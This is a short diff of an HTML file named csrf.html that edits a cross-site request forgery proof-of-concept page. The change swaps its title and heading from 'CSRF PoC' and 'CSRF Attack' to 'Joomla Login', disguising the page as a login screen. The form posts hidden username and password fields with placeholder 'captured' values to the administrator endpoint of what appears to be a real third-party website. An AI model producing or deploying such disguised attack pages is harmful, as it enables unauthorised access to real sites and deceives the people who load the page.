--- a/csrf.html
+++ b/csrf.html
@@ -1,7 +1,7 @@
 <html>
-  <title>CSRF PoC</title>
+  <title>Joomla Login</title>
   <body>
-    <h2>CSRF Attack</h2>
+    <h2>Joomla Login</h2>
     <form action="https://goodtreeacademy.org/administrator" method="POST" id="csrf_form">
       <input type="hidden" name="username" value="captured_username" />
       <input type="hidden" name="passwd" value="captured_password" />
